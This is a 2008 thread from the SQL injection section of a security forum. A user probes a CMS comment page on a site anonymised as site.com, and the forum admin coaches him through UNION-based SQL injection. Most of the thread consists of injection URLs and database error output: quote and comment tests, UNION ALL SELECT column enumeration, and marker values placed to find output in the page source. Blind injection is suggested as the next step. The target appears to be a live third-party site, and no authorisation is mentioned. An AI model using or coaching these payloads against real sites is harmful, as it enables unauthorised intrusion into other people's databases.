|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
What is the next step |
|
Posted: Mon Mar 03, 2008 1:41 pm |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
Hi again (:
Code: | site.com/cms/afficher_commentaire.html?numArticle=285' |
=> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''285''' at line 7
Code: | site.com/cms/afficher_commentaire.html?numArticle=285" |
->show me a news with a lot of bug
Code: | site.com/cms/afficher_commentaire.html?numArticle=285'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--+ |
show me a buggy news too :s
I've test each 1,2,3... because on the news it doesnt show me the count of column, but no one was working with @@version.
Can it be help or it is no use to continue? |
|
|
|
|
|
|
|
|
Posted: Mon Mar 03, 2008 2:16 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Try this tests:
Code: |
site.com/cms/afficher_commentaire.html?numArticle=285'--+
|
Code: |
site.com/cms/afficher_commentaire.html?numArticle=285--+
|
Do you see normal news text? Or is there errors? |
|
|
|
|
Posted: Mon Mar 03, 2008 4:14 pm |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
It displays news with some bug again for the both of them. Actually, it displays the start of the news(title and header), then what is following is mess up but no error. |
|
|
|
|
Posted: Mon Mar 03, 2008 4:21 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
What you need is meaningful sql error messages.
Try:
Code: |
site.com/cms/afficher_commentaire.html?numArticle=-1+UNION+ALL+SELECT+1--+
|
Code: |
site.com/cms/afficher_commentaire.html?numArticle=-1'+UNION+ALL+SELECT+1--+
|
Code: |
site.com/cms/afficher_commentaire.html?numArticle=-1)+UNION+ALL+SELECT+1--+
|
Sql errors? Post them here. |
|
|
|
|
Posted: Mon Mar 03, 2008 6:18 pm |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
Code: | site.com/cms/afficher_commentaire.html?numArticle=-1+UNION+ALL+SELECT+1--+
|
Error handled by webmaster
Code: | site.com/cms/afficher_commentaire.html?numArticle=-1'+UNION+ALL+SELECT+1--+ |
Error : The used SELECT statements have a different number of columns
Code: | site.com/cms/afficher_commentaire.html?numArticle=-1)+UNION+ALL+SELECT+1--+ |
Error handled by webmaster |
|
|
|
|
|
|
|
|
Posted: Mon Mar 03, 2008 6:50 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
So if you tried this:
Code: | site.com/cms/afficher_commentaire.html?numArticle=-1'+UNION+ALL+SELECT+1--+ |
then error was complaining about wrong column count?
Next try to find right column count:
Code: | site.com/cms/afficher_commentaire.html?numArticle=-1'+UNION+ALL+SELECT+1,2--+ |
Code: | site.com/cms/afficher_commentaire.html?numArticle=-1'+UNION+ALL+SELECT+1,2,3--+ |
Code: | site.com/cms/afficher_commentaire.html?numArticle=-1'+UNION+ALL+SELECT+1,2,3,4--+ |
and so on.
If column count is right, then error message will disapear or change.
Let me know about right column count.
P.S. Column count can be big number - even > 50 |
|
|
|
|
Posted: Mon Mar 03, 2008 7:17 pm |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
i already did it, see at the first post ^^ The error stop to 13 but no information is given as i see |
|
|
|
|
Posted: Mon Mar 03, 2008 8:16 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Look at html source code, try columns with more specic strings, like "UNION ALL SELECT 999901,999902,999903,...999913--+" and then look for "9999" in html source.
And if still there is no useable visual feedback, then you need to implement blind injection methods. It's more complicated and has bad performance. |
|
|
|
|
Posted: Mon Mar 03, 2008 9:41 pm |
|
|
Nial |
Advanced user |
|
|
Joined: Feb 29, 2008 |
Posts: 103 |
|
|
|
|
|
|
|
Nothing in the source, it seems that i have to give up ^^
Your knowledge is really helpful anyway, thank you ^^ |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|